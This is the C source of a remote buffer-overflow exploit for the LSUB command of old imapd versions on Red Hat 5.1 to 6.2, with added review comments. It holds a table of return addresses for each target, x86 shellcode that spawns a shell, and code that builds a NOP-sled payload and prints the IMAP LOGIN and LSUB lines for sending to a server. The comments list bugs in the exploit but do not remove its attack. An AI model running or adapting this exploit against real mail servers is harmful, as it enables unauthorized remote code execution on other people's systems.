Imapd v12.264 remote exploit for Red Hat - Exploits a buffer overflow in the LSUB command; valid account credentials are required (the attack is post-authentication). Tested on Red Hat 5.1, 5.2, 6.0, 6.1, and 6.2 with IMAP4rev1 v10.223, v11.241, v12.250, and v12.264.
1542948361aa96f2782cdf5b46132faf343b4b47b03acc2ca5766e95cbac1002
/* Exploit by Narrow <nss@privacyx.com> (29 September 2000) */
#include <stdio.h>
#include <string.h>
/*
 * One target profile. main() prints imapver in its usage listing and
 * writes (ret_addr - offset) repeatedly into the payload buffer.
 */
struct types {
char *imapver;          /* human-readable label shown by the usage text */
unsigned long ret_addr; /* value spread across the buffer after the shellcode */
int offset;             /* subtracted from ret_addr; every table entry below uses 0 */
};
/*
 * Target table, terminated by a NULL imapver entry.
 * NOTE(review): main() never uses the NULL terminator — its usage loop
 * hardcodes indices 0..4, and the user-supplied index from argv[3] is
 * not range-checked against this table before being used.
 */
struct types types[] = {
{"Red Hat 6.2 - IMAP4rev1 v12.264",0xbffff2c8,0},
{"Red Hat 6.1 - IMAP4rev1 v12.250",0xbffff2c4,0},
{"Red Hat 6.0 - IMAP4rev1 v12.250",0xbffff2f0,0},
{"Red Hat 5.2 - IMAP4rev1 v11.241",0xbffff320,0},
{"Red Hat 5.1 - IMAP4rev1 v10.223",0xbffff31c,0},
{NULL,0,0}  /* sentinel (unused by main()) */
};
/*
 * Opaque machine-code byte string, credited by the original author to
 * imapx.c; it is not decoded in this listing.  main() measures it with
 * strlen(), so the bytes must contain no embedded NUL — the copy into
 * the buffer stops at the first 0x00 byte.
 */
char shellcode[] = /* shellcode from imapx.c */
"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
"\x2f\x32\x39\x3e\x2f\x43\x38";
/*
 * Builds a 1064-byte LSUB argument and writes an IMAP LOGIN command,
 * an LSUB command announcing a {1064} literal, and the raw buffer to
 * stdout.  The program itself opens no network connection: everything
 * is emitted on stdout, so it only has an effect if the output is piped
 * to an IMAP server by the caller.
 *
 * argv[1] username, argv[2] password, argv[3] index into types[].
 * Returns 0 after printing usage; otherwise falls off the end of main().
 *
 * NOTE(review) — defects visible in this block, left as-is:
 *  - argc is checked for < 3 but argv[3] is read unconditionally, so
 *    running with exactly two arguments passes a NULL to atoi().
 *  - atoi() is used without <stdlib.h>; only <stdio.h>/<string.h> are
 *    included, so this relies on an implicit declaration.
 *  - The fill loop uses i<=1064, so its last iteration stores past the
 *    end of buf[1064] (a stack buffer overflow in this program itself).
 *  - The store is through `long *`; it advances 4 bytes per step, which
 *    only matches sizeof(long) on an ILP32 host.
 */
int main(int argc, char **argv)
{
char buf[1064];   /* payload sent as the LSUB literal; indices 0..1063 are valid */
int i,type;
if(argc < 3) {    /* NOTE(review): should guard argv[3] as well */
printf("Usage: %s <username> <password> <type>\n\n", argv[0]);
printf("Type:\n");
/* hardcoded 0..4 rather than walking to the NULL sentinel in types[] */
for(i=0; i<=4; i++) printf("%d - %s\n", i, types[i].imapver);
return 0; } type = atoi(argv[3]);  /* no range check against types[] */
/* first 1032 bytes set to 0x90; bytes 1032..1063 are covered by the loop below */
memset(buf, 0x90, 1032);
/* shellcode copied at offset 613; strlen() stops at the first NUL byte */
memcpy(buf+613, shellcode, strlen(shellcode));
/* repeat (ret_addr - offset) every 4 bytes from the end of the shellcode;
 * i<=1064 means the final store lands outside buf[] */
for(i=strlen(shellcode)+613; i<=1064; i+=4)
*(long *)&buf[i] = (unsigned long)types[type].ret_addr - types[type].offset;
/* IMAP dialogue on stdout: authenticate, then announce a 1064-byte literal */
printf("1 LOGIN %s %s\r\n", argv[1], argv[2]);
printf("1 LSUB \"\" {1064}\r\n");
/* raw bytes (may include 0x00 and 0x90) — putchar() is used so they are not NUL-terminated */
for(i=0; i<1064; i++) putchar(buf[i]);
printf("\r\n");
}